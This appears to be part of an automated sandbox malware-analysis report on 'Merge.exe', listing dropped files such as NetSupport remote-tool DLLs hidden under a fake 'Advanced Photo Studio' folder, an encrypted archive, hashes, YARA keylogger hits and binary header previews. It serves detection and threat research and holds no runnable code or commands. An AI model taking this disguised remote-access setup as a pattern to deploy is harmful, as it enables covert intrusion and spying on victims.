                                                                                                  SHA-512:F4DB9038A113C4B1E2462B3E0BECEF2500C9532A79C8187F51D011D690BC68C6D1A99585E43136CB082BD6A232136546DB50265F226FF19E67D8430306A8761F
                                                                                                  Malicious:false
                                                                                                  Preview:1200..0x5ecfb5df....; NetSupport License File...; Generated on 02:56 - 17/10/2015........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=RETHNQOPD22..maxslaves=100000..os2=1..product=10..serial_no=NSM298578..shrink_wrap=0..transport=0..
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46
                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                  Malicious:false
                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):108944
                                                                                                  Entropy (8bit):5.800439974193529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LnzOfAUs8aONOb2H4NECHnTXg05rQMb2bbaPrw6BkJElFBIboKKGQ1w:LnSfAB8cb2YN7pSy8AuElFBIboKKGSw
                                                                                                  MD5:67C53A770390E8C038060A1921C20DA9
                                                                                                  SHA1:49E63AF91169C8CE7EF7DE3D6A6FB9F8F739FA3A
                                                                                                  SHA-256:2DFDC169DFC27462ADC98DDE39306DE8D0526DCF4577A1A486C2EEF447300689
                                                                                                  SHA-512:201E07DBCCD83480D6C4D8562E6D0A9E4C52ED12895F0B91D875C2BBCC50B3B1802E11E5E829C948BE302BF98EBDE7FB2A99476065D1709B3BDBCD5D59A1612D
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m...m...m.......l.....{.......:.....j...m.......k...l...k...h.......l.......l...Richm...........PE..L....b.R...........!.........p.......\............p..........................p...................................... .......`...P....@..............H...H....P.......................................................................................text...>........................... ..`.rdata........... ..................@..@.data...|.... ...@... ..............@....rsrc........@.......`..............@..@.reloc.......P... ...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14664
                                                                                                  Entropy (8bit):5.731764073034684
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:uuYr6062b6Z1HVF6RRHXPPr+13fnYe+PjPIrI9FlP4r9ZCspE+TMlr78Vkf:uuYe72u6r+5nYPL7NheMr
                                                                                                  MD5:3AABCD7C81425B3B9327A2BF643251C6
                                                                                                  SHA1:EA841199BAA7307280FC9E4688AC75E5624F2181
                                                                                                  SHA-256:0CFF893B1E7716D09FB74B7A0313B78A09F3F48C586D31FC5F830BD72CE8331F
                                                                                                  SHA-512:97605B07BE34948541462000345F1E8F9A9134D139448D4F331CEFEECA6DAD51C025FCAB09D182B86E5A4A8E2F9412B3745EC86B514B0523497C821CB6B8C592
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...+..R...........!......................... ...............................`...........@.........................p"..a.... ..P....@............... ..H....P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3490632
                                                                                                  Entropy (8bit):6.524926029037826
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:FwWtZSlgPoqxyszApD0Ew0J94KinCgqGBQTdTBOHa3clSToWZiwDA:FwWrSlgHyszApD090mCgqTUSPE9
                                                                                                  MD5:E7B92529EA10176FE35BA73FA4EDEF74
                                                                                                  SHA1:FC5B325D433CDE797F6AD0D8B1305D6FB16D4E34
                                                                                                  SHA-256:B6D4AD0231941E0637485AC5833E0FDC75DB35289B54E70F3858B70D36D04C80
                                                                                                  SHA-512:FB3A70E87772C1FB386AD8DEF6C7BDF325B8D525355D4386102649EB2D61F09CE101FCE37CCC1F44D5878E604E2E426D96618E836367AB460CAE01F627833517
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........7...Y...Y...Y.x.....Y..o...Y......Y...]...Y..o...Y.....Y...X...Y.....Y.....Y..o...Y..o.;.Y..o...Y..o...Y..o...Y.Rich..Y.........................PE..L......T...........!.....h...&................................................5......46..............................C..................P............*5.H.....3.(......................................@...................h...`....................text...|f.......h.................. ..`.rdata...............l..............@..@.data...(!...P.......2..............@....tls................................@....hhshare............................@....rsrc...P...........................@..@.reloc..T!....3.."....3.............@..B........................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59728
                                                                                                  Entropy (8bit):6.314316932816872
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Uf6nvXuNcAjJMBUHYBlXU1wT2JFqywsQ:e6nPcjJ4U4I1jFqywL
                                                                                                  MD5:5BE6FB8F28544D4F83C25A2B76FF7890
                                                                                                  SHA1:6AD5D9338984C52B37F2176C8AE4AE2366A7FD25
                                                                                                  SHA-256:B11380F81B0A704E8C7E84E8A37885F5879D12FBECE311813A41992B3E9787F2
                                                                                                  SHA-512:7635FC41DD7BE6A55D944DB7790E31FD607BFDC67845185FACD52BCDA24DA139C5BA4FE0292EAD097EAA606ED53FCFD2CE96C2FB7A15F3ABA5FE7262E8041028
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L...Nm.R.....................J.......!............@.......................... ............@....................................<.......X...............P...............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...X...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):387400
                                                                                                  Entropy (8bit):6.790076330169725
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:bn452GF6HWSJkgGjMTUjemzWz+ZsYRtFM2V3KZ/aDVpIxNc+KT5Ev7pt0AUazmgt:D452GF6HlkgGjMT8emzWusytFMKDXIxj
                                                                                                  MD5:1E6E804CA71EAF5BEF0ABEF95C578CF0
                                                                                                  SHA1:8EB7E6EFF15EDCB01D20322C4994512FDD1DD227
                                                                                                  SHA-256:6FFE12CDFE0A36DEC4B4A40ECDAFB4097B1AF7C340B0FCECF9F5C67B7FA8B299
                                                                                                  SHA-512:197B782EFA21AC87A54D3E63F90A75D80D70A30BFD686D29ED36EDE79328DB2AEF58C8B242906BF7A6C9C0B33B8FA5F0EF23E541BB0D5C0786481BDCCE191061
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....).T...........!................w........................................p...........@..........................w..o...Tk..x.......@...............H.... ...D..................................`O..@...............h............................text...,........................... ..`.rdata../...........................@..@.data...h............j..............@....rsrc...@...........................@..@.reloc...E... ...F..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11099136
                                                                                                  Entropy (8bit):6.484410783068131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:196608:tOrlHcZAJV6yk6yKPj6Povvihvi6UZOUZMRthNGdiO5iUld3ZyM+6xHECMgwO855:Q8ZAJgLhNGdiO5iUld3ZyM+6xHECMgwz
                                                                                                  MD5:DA5B9A31F05338118A3877EC516BE04A
                                                                                                  SHA1:1084AB557940F064C6B2CF12129E6376FAC6ED27
                                                                                                  SHA-256:0919BB5672C2289161194940B030495C1E4D5CDCFBC1D8FED652B4652525F687
                                                                                                  SHA-512:7AC4FF3AFF9B3C50C6C5CA57B5820A831EFEC9DCDDA1C69FB82B1DF1E3E0E7B3F5631288774D3CCFDD2A7DEBDF7B7062DA59AB6FE024EDB282D55FF3FF05E44B
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$........{!...O...O...O..bL...O..bJ.d.O..bK...O.......O...L...O...K...O...J...O...K...O.X.K...O..K...O...K...O.X.J...O..J...O...O...O...K...O..bN...O...N...O...F...O...O...O.......O...M...O.Rich..O.........PE..L...k..g...........!...)..W...Q.....t.Q.......W...........................................@................................x..........`...........................x...8...............................@.............W.`............................text...l.W.......W................. ..`.rdata..L.O...W...O...W.............@..@.data............................@....rsrc...`...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27630784
                                                                                                  Entropy (8bit):7.999987918643883
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:786432:INKBYjUMojDqpPBm1I+yuCUegHOdUXed9:INKqjMfsZECUhRA9
                                                                                                  MD5:35616EA1167648C4D8A58F90A70E6E97
                                                                                                  SHA1:6A547A8FF546C1409B45B7DCBB2E6EE1F69F96C0
                                                                                                  SHA-256:F107E1DECBF477AA43854A3D6181DFAF10DB30359CB1ABBBF87B2FDFFA2026FB
                                                                                                  SHA-512:D538D90B17F36EA182AE4AEACC7E2FCDAD864A7149DC5D7BA350802757467EA66E2B680C068B33C0B2999CBE79438BF7CDCE7ED063A86D017D67D71AAB9E7107
                                                                                                  Malicious:false
                                                                                                  Preview:7z..'....'Q.{.......%........fV..&..].......lF*n..>.W...W^.....#~.P[.......g..s.b......|....A.......m...fMc..N......$...W.0H3.......,..%.{wxt..[.?M...Y......A.8b....N.+N..'.,S....C..N.....5I...p--DT.t.|%2..0....?...la...L{..|.......'.4..q3...s..F.u.UU....i.......c.l..T-72.;....`#h..M&...@....?a.6ko.d..24..:......u....4.....C.*..........v..@..WD..$8...cV.L]....Jv.[O`m}r..#..]..R.....K}Z...s...j.o......HL.f:..q.Y..{...[...}.....T... ..t...G.;.Q..D......b...HPc....Z7..2U....w-$q.....+.d.`K.Y..A....D.6x.VLU.w... .7Q.6....+..`.3s..R..}.O.x<vi.{....(...a..y.u...iO....(.isq...p..q.xS._..gDv}4.6,....wf\....K.?.\..:.2.....q..Ee.L.PZ......$...GVo$x..\......\.[.S.}.k.^fr..8..........),.);...(.....2U..p..hUd.V.,..:.....a......$.......01.I.....[pM.....g.2K.T....\#.....B.,.I.d.&F.v. ......{;I......Q..{..B.2x#.'".w...Q.-.F..o .L/...LGE[......t...?.x..PC..m'..-..-|1}....../.....,.....C....i..[.3.QO....R..u..~+.O.....0...&.%?..h<v..h.N....!...3.....j..
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:Berkeley DB (Btree, version 9, native byte-order)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.030191689390222036
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:0lBCtNl1lV99q9ldlE/l9ltlBttklV99q9ldlE/l:c2V98M91LCV98M
                                                                                                  MD5:18B61C1E21D0040792B000B4903267D7
                                                                                                  SHA1:282D52755D87D4892E2D67821C4AEC5B0BD0E4EB
                                                                                                  SHA-256:DF5CCEC360B2A599BA6FF63A3811A4FA1D8AFE387E91C477C20C7B4869770A03
                                                                                                  SHA-512:5F5836DD9BD222C82DA194A23D9D2D78E156704A398C81E332DA64B0941CD62871F4C2559BF2EE911FC8AF45651B9305C85FF961E799E16D05909F9AFFA9EBBB
                                                                                                  Malicious:false
                                                                                                  Preview:............b1....... ..............................0.......)X./.................... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):130
                                                                                                  Entropy (8bit):2.6212307144865425
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDzk+xlliplltq8QRXe//w:x0zjsplK8Ee//w
                                                                                                  MD5:647E8E57755CF2ADA12589060C50C079
                                                                                                  SHA1:A7DA88301FE4A32AAA36FDC216F743A9FBE557EB
                                                                                                  SHA-256:6E45A40F910A85232E711D528C16B33956A3212CAC414C3B7DDDCCF2856C64EB
                                                                                                  SHA-512:EC0D03B7950D82D58E8F36724D9D072C82ED943DECD82F68AA94134F5A334B32F11726B83B8A1936A84CC8018D8999FC0AE29EF2371CF7F5DACC47BA06C9BC6B
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Data............292.............................[PGI>.......n..Output......1..................................PGI]
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):134
                                                                                                  Entropy (8bit):2.3816183899920396
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDiijIxll0lbqQRVQRDshtll:x0iVeGEVnh
                                                                                                  MD5:110090F60E6DA1EBD8C003DD4A8EFE22
                                                                                                  SHA1:DC592E5FB12B34413CBD1FA8BDD6B8DE063B6E3F
                                                                                                  SHA-256:9A74DE2A2AFA6919AFC2F30A0B046D929DBBBE8786E7F70B1C9C42304C9252A9
                                                                                                  SHA-512:8870D0C11A04D1641016EAD4D27FFDF4CA4D0C8EC5A031DE0439EF72AE5D2DE92A8FC62DD9B54C1AA76D5E03D7A36D9939429087FDE7B8271FA3EB22D99F5EB4
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Metadata........292.................................................Outputn......1....@...............................
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):128
                                                                                                  Entropy (8bit):2.381368203576206
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDV7utfWxll0ldll5lnlrlGGll/ll:x0R6eewylt
                                                                                                  MD5:F77D1E71899B17369674A75E9172E092
                                                                                                  SHA1:0FF1BAB32F8B440DB087A93BE1AE1AC637F78E4B
                                                                                                  SHA-256:0258F7989A239BCE0540BFF682FDB9B2A33C21F0627E53D266E4B04FEC4D5D8E
                                                                                                  SHA-512:9E096A37064B6C999B1D830151331A824ED99DFAB4D29402C4A37C6449CB6421338BE699E5ABEFA054C6B5638AE258D8D48A81DC719D9A3E6C2722FBAAD43BB2
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Index Table.....292.............................................@.......n.......z.................^g............
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):395
                                                                                                  Entropy (8bit):4.761438011606809
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:LS+4owxP9Eyv+0gfYXOHPzbigXDaqE3or:6pl2yz+vzWQr
                                                                                                  MD5:81F2221A6F05D6126505A5000DB0516F
                                                                                                  SHA1:9C42485CF0F69DA484F98B4A813AEFD89C2D008F
                                                                                                  SHA-256:5A241BAF7612A922636724FBDF4A93603A2FF6B5057A46D44CFFBAAF90D8B4B4
                                                                                                  SHA-512:AB7434FEF62F43BEEA2C18C4A3CB8398075E2FB1D5A8BDC1288EFAD2EC83703306F87C7A320B948770162EE2DED1C9B1DBD6122CC1519944BB45A101872A05DF
                                                                                                  Malicious:false
                                                                                                  Preview:[.{ "rank": 0, "start": "Sun_Dec_15_07:36:51_2024", "threads": 1, "bytes": 130, "aggregation_mus": 0, "buffering_mus": 204, "memcpy_mus": 0, "minmax_mus": 0, "meta_sort_merge_mus": 133, "mkdir_mus": 683, "transport_0": { "type": "File_fstream", "open_mus": 245, "write_mus": 48, "close_mus": 69696}, "transport_1": { "type": "File_fstream", "open_mus": 211, "write_mus": 28, "close_mus": 0} }.].
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.270567620343947
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXyvn:6ydIn
                                                                                                  MD5:86EF038CDEC028873992EEEA93BE75AE
                                                                                                  SHA1:DAB84256410FA44617231E030D296650D8AA7802
                                                                                                  SHA-256:271FB734C4FD6BE9DF843DC03B29CB339337FE10A150B7A554D35DDE3B353443
                                                                                                  SHA-512:F1587ACF8BA46682CB2ADF32EDEA11C19DEA32581819CE8E8A37BCA7600BC7FB2BA6FD993E1A25BB85F5843716F6D85ABD902912F80BCD9FD9C0062F39F2BE9B
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5j8.1.
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.211744090932181
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxvn:6ydI8vn
                                                                                                  MD5:BA415CD8B1C7C0857D2165A9D1F766B7
                                                                                                  SHA1:ED198B11022395B83295014B686E7EEA89F3DE4A
                                                                                                  SHA-256:EC1272B50438940DB626E535C4953165A639552C47C50F946BDBEDEC6336B4B9
                                                                                                  SHA-512:88876B798D65CEB0A119894C200CA5A8A2FCEF54D05E120571FA433A4B919FEA09F195E81E67DD7A0BBE0B47469B081B2876ED5D02FC53601438D217EE6DAB24
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5j8.2.
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.17512313511346
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxUv:6ydIWUv
                                                                                                  MD5:747BCCDF6C9546D93F87DA2811AEDF3A
                                                                                                  SHA1:6911973C2D3111295B3B4F459115D1B2EC21B872
                                                                                                  SHA-256:BA495058B34316635E61FC28ECD4D40D7F2DE449AA27590EB6F6EE5152E7092C
                                                                                                  SHA-512:0637D56AD04138C350CA105C3C2ABE8A8B2831D9DAE8F29035F56412C1A327747266099912920363C70ECD81473DBA313E1F7AF5678BED968015B64B28A5170E
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5sg.1.
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.116299605701696
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxXv:6ydIW/
                                                                                                  MD5:2C6725D38A636D40485430F5F3813C18
                                                                                                  SHA1:76E3FE349F73F32F9F5CFD92875F8C9F0ED3C341
                                                                                                  SHA-256:6AAD127FBF69B2F85E0E74CC708AC3415B2086EE599F6D22CA120D492FA18BEC
                                                                                                  SHA-512:2B232D51B2DB1D9C53417022DAD2EDBC620BC06B63BCEB99D1A5DC2D03D21299D90B8612B974D54B96D576983670AD762AEA03036A4AA9FB7A8C51A895BBE796
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5sg.2.
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35
                                                                                                  Entropy (8bit):2.258492676514824
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:XVl6EcxvVKM:kp7
                                                                                                  MD5:D880A299052F9E9DFE0A27A82BCB75A9
                                                                                                  SHA1:7A94DB3C9AA1C526F2B09516AECDC647830A7DB9
                                                                                                  SHA-256:08D23E43FF2E59F5AA84828E4C05A3D61AE6E8C7319318EA57F7A2E91A5FEF2B
                                                                                                  SHA-512:DF2B90AF64C031980FFC6B49D2CFB20EDD79FF31030747689100BD4F916798629D526C4AE84F3E1AD1E530D857CB767DA321CA8EC5376E2FEEB679BBA132AFBD
                                                                                                  Malicious:false
                                                                                                  Preview:0 0 0..1 0 0..1 1 1..0 1 0..0 0 1..
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:Berkeley DB (Btree, version 9, native byte-order)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.04605058557444765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:0lBCtNl1lV99q9ldlE/l9ltl76VlelV99q9ldlE/lggPlLB:c2V98M91+P6V98Mge/
                                                                                                  MD5:9097AAD102EDF3B7CE162F4837BCB669
                                                                                                  SHA1:487F5B9AAA71B1AD48731A0B0EC55FD9C9035E2C
                                                                                                  SHA-256:BD236526BD6F03B4947542B71F7A297E09125549C97102E1BDBA9B51B452C173
                                                                                                  SHA-512:B9B82586AF6EA53E13907FF66FC89212042BA159F39D020F52E9FE52EF4B2E88935C5E7DB98E4C54C1627152A809A63A84795298B71E08F823F96884C6B7E821
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.670508154447709
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Merge.exe
                                                                                                  File size:44'935'240 bytes
                                                                                                  MD5:d024ff2fc7acb7c172f0ba38a9fbc2c3
                                                                                                  SHA1:fd79908540ba4abf2beeeb7e93705b8bd8c6609f
                                                                                                  SHA256:113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1
                                                                                                  SHA512:a9b8d4404f7e8338b33e218c1ab8fe773beae991b951ebbd574b8e2da991fd17f6d7c41a479b53684a0514a740a2fdeec3ae2cb2a61d5ccbb840415c8bbbc1a9
                                                                                                  SSDEEP:786432:BIOK9MrmgNNKBYjUMojDqpPBm1I+yuCUegHOdUXedH0:W6mgNNKqjMfsZECUhRA
                                                                                                  TLSH:51A70242F74391B1C8460A3400BF9B7666397E19931987F7EBE8393569727C12B3B788
                                                                                                  File Content Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$..........b.f.1.f.1.f.1...0.f.1...03f.1...0.f.1..g1.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.g.1...0kf.1...0%e.1...0.f.
                                                                                                  Icon Hash:68ccceecce8eac70
                                                                                                  Entrypoint:0xccdbca
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x671810FD [Tue Oct 22 20:54:21 2024 UTC]
                                                                                                  TLS Callbacks:0xccd2d4, 0xccd898
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:6
